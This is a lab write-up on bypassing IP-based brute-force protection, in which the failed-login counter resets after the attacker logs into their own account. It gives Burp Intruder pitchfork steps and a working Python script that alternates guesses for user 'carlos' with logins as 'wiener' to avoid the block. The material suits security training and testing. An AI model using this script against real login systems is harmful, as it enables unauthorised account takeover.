# Broken brute-force protection, IP block
---
- It is highly likely that brute-force attack will involve many failed guesses before the attacker successfully compromises an account.
- **Logically**, brute-force protection revolves around trying to make it as tricky as possible to automate the process.

The `two` most common ways of preventing brute-force attacks are:
1. *Locking* the account that the remote user is trying to access if they make too many failed login attempts.
2. *Blocking* the remote user's IP address if they make too many login attempts in quick succession.

For **example**, you might sometimes find that your IP is blocked if you fail to log in too many times. In some implementations, the counter for the number of failed attempts resets if the IP owner logs in successfully. This means an attacker would simply have to log in to their own account every few attempts to prevent this limit from ever being reached.

# Lab: Broken brute-force protection, IP block
---
1.  With Burp running, investigate the login page. 
	- Observe that your IP is temporarily blocked if you submit 3 incorrect logins in a row. 
	- However, notice that you can reset the counter for the number of failed login attempts by logging in to your own account before this limit is reached.
2.  Enter an invalid username and password, then send the `POST /login` request to Burp Intruder. 
	- Create a pitchfork attack with payload positions in both the `username` and `password` parameters.
3.  On the **Resource pool** tab, add the attack to a resource pool with **Maximum concurrent requests** set to `1`. 
	- By only sending one request at a time, you can ensure that your login attempts are sent to the server in the correct order.
4.  On the **Payloads** tab, select payload set 1. 
	- Add a list of payloads that alternates between your username and `carlos`. 
	- Make sure that your username is first and that `carlos` is repeated at least 100 times.
5.  Edit the list of candidate passwords and add your own password before each one. Make sure that your password is aligned with your username in the other list.
6.  Add this list to payload set 2 and start the attack.
7.  When the attack finishes, filter the results to hide responses with a 200 status code. 
	- Sort the remaining results by username. 
	- There should only be a single 302 response for requests with the username `carlos`. 
	- Make a note of the password from the **Payload 2** column.
8.  Log in to Carlos's account using the password that you identified and access his account page to solve the lab.

```python
#!/usr/bin/env python3
# Broken brute-protection, IP block
# ---------------------------------
# Everytime, we got blocked. We login using our credentials
# To reset the block attempts.
# Keep looping until we found the correct credentials
import requests
import sys

# Debugging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

MYUSER = "wiener"
MYPASS = "peter"

def pass_list(url, user, pass_path):
    with open(pass_path, 'r') as f:
        for passwords in f.readlines():
            password = passwords.replace('\n','')
            data = {'username':user, 'password':password}
            req = requests.post(url, data=data, verify=False, proxies=p)
            if "You have made too many incorrect login attempts." not in req.text and "Incorrect password" not in req.text:
                return password
            else:
                data = {'username':MYUSER, 'password':MYPASS}
                req = requests.post(url, data=data, verify=False, proxies=p)
            continue
        return False         

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        user = sys.argv[2].strip()
        password = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: {} <url> <user> <passwords>".format(sys.argv[0]))
        print("[-] Example: {} http://example.com admin password".format(sys.argv[0]))
        sys.exit(1)

    print("[+] The username...  [{}]".format(user))
    print("[+] Enumerate the password...")
    passwd = pass_list(url, user, password)
    if passwd:
        print("[-] Found the password...    [{}]".format(passwd))
```